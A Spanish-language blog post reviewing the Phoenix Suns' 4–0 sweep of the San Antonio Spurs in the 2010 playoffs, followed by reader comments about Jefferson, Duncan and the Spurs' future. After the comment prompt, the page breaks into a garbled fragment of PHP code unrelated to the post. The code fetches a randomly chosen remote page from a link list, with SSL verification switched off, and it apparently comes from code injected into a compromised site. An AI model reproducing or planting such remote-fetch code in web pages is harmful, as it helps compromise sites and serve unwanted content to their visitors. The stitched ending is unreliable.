Playoffs 2009-2010: Semifinales de Conferencia Oeste (I)

10 de May de 2010 por MagicJohnson32

Suns 4 – Spurs 0manunash

Por supuesto que Steve Nash acabó el partido con el rostro marcado, testimonio de la batalla, recordatorio del valor del triunfo obtenido, prueba de que el rival jamás se dio por vencido.

Por supuesto.

Porque así es como el destino se cobra, en ocasiones, las cuentas pendientes. Con justicia, de la poética y de la otra, la material, la resultadista, la que sirve a los Suns para alcanzar las Finales de Conferencia y eliminar por primera vez a los San Antonio Spurs en lo que va de década tras cuatro dolorosas victorias texanas.

Pese al 4-0 final, los Spurs han sido un rival dignísimo, como siempre. Sin embargo, la ciencia de Popovich ha resultado incapaz de descifrar la alquimia de Gentry: en el primer partido, Nash, Richardson y Stoudemire sumaron 83 puntos; en el segundo, a la aportación del trío se sumaron Hill, brillante en defensa, y Frye, con 5 triples; en el tercero apareció Dragic, hasta entonces inédito, para anotar 26 puntos en un abrir y cerrar de ojos; y anoche, al margen de Nash y Stoudemire, fue Dudley, que sumaba 1 de 7 en triples en la serie, quien se destapó con 3 de 3 desde más allá de la línea.sunsbench

Un equipo con demasiados recursos, una ecuación con demasiadas variables para los Spurs, que lo intentaron devolviendo a Tony Parker a la titularidad en lugar de George Hill. Tal vez les habría ido mejor sentando a Jefferson. O mejor aún, gastando el dinero que le pagan al ex Nets en, digamos, un jugador válido para un equipo con aspiraciones.

A los Spurs les quedan las dudas. Desde la llegada de Duncan, jamás habían pasado tres temporadas consecutivas sin título. Es, además, la segunda campaña seguida sin alcanzar las Finales de Conferencia. Y el séptimo puesto en la regular season ya anticipaba algo que seguramente el triunfo en primera ronda ante los Mavs nos hizo olvidar: el tiempo de los Spurs ha pasado. Hay futuro en George Hill y DeJuan Blair,  pero el fiasco de Richard Jefferson (con un año y 15 millones más por delante) es una enorme losa y el nuevo contrato de Ginóbili (3 años más, 40 millones) ya no parece tan buena idea.

MVP: Qué honor es haber disfrutado de los mejores años de Steve Nash. Mejor dicho: estar disfrutando. Porque el canadiense, a sus 36 años, sigue dando lecciones a nivel de MVP. Dejemos, por un día, las estadísticas y limitémonos a disfrutar del juego de todo un señor de las pistas.

El rookie: DeJuan Blair ha sido el único rookie con minutos en la serie, y han sido más bien escasos. Ni siquiera con su ratio de rebotes por segundo puede uno ganarse el premio en un acumulado de 35 minutos.

tduncantparkerLa sorpresa: Suns 4 – Spurs 0. ¿No es suficiente sorpresa?

La decepción: Ni a 10 puntos por partido ha llegado la aportación de Richard Jefferson, uno de los jugadores que quedan más tocados de esta eliminación. No es que esperásemos más de él, pero sirva para constatar lo visto durante toda la temporada.

El mayor esfuerzo en vano: El trío estelar de los Spurs ha dado la cara, salvo en partidos concretos. Nos quedamos con la mayor regularidad de Tony Parker, autor de 3 partidos de 20 o más puntos y más del 50% de acierto en tiros de campo.

Así lo hemos contado nosotros:

Spurs 102 – Suns 111

Spurs 102 – Suns 110

Suns 110 – Spurs 96

Suns 107 – Spurs 101

Comenta

7 comentarios a esta entrada

  1. HeiNeKeN dice:
    #1

    De acuerdo en todo salvo en que George Hill aparezca en el premio de los Rookies… que es su 2º temporada xD

      Citar

  2. MagicJohnson32 dice:
    #2

    ¿Quién dice que George Hill sea rookie? xD

    PD: Qué manía me ha cogido, en serio, con que Hill es novato, y mira que lo tengo visto… En fin, corregido.

      Citar

  3. sayim dice:
    #3

    Otro matiz: los Spurs no fueron campeones ni en el 2000, 2001 ni 2002 (los tres anillos de LA) con Duncan ya en el equipo.

    Yo creo que este equipo tiene futuro: Parker, los ultimos coletazos de Ginobili y Duncan, Hill y Blair son muy válidos, Splitter cuando se decida a ir….

    Un saludo

      Citar

  4. sergio dice:
    #4

    Sayim, por eso dicen que nunca han pasado MAS de tres años sin conseguir un titulo. Vamos, de hecho sigue sin ocurrir porque ahora solo llevan 3 años desde la temporada 2007 en la que consiguieron el ultimo, no??

      Citar

  5. sayim dice:
    #5

    cito textualmente:
    “A los Spurs les quedan las dudas. Desde la llegada de Duncan, jamás habían pasado tres temporadas consecutivas sin título.”

    pero vamos, que solo es una apreciación sin importancia. En el fondo todos entendemos lo que quiere decir, que los Spurs van a tardar en volver a estar en una final, toca reconstrucción. Decepción total de Jefferson, ¿cual seria el peor fichaje del año pasado? ¿jefferson, la parejita de los pistons, el turco en canada? Hay decisiones que hipotecan el futuro inmediato de algunos equipos

      Citar

  6. Rompe dice:
    #6

    Yo creo que la parejita de Detroit se lleva la palma. De un equipo, a priori, para entrar sobrados en PO, a esa banda…

      Citar

  7. pcerezo dice:
    #7

    Lo de Detroit es de traca. Villanueva-Gordon no soluciona nada. Al final los 20 millones de Gasol son más baratos que por ejemplo lo de Villanueva-Gordon, Turkoglu-Bargnani, los 15 de Jefferson.
    El problema de Spurs sin duda es que la gasolina de Dunca se ha acabado. Da la sensación que no puede más y hasta a veces no quiere más. Salvo un partido con Mavs sus PO han sido muy decepcionantes.
    El verdadero problema es que todo el engranaje de Spurs estaba basado en Duncan y vovler a disponer de un jugador como éste se hace muy, muy difícil. Veremos como reconstruyen. Siempre han elegido bien en Draft jugadores de clase media pero ahora necesitan más.

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>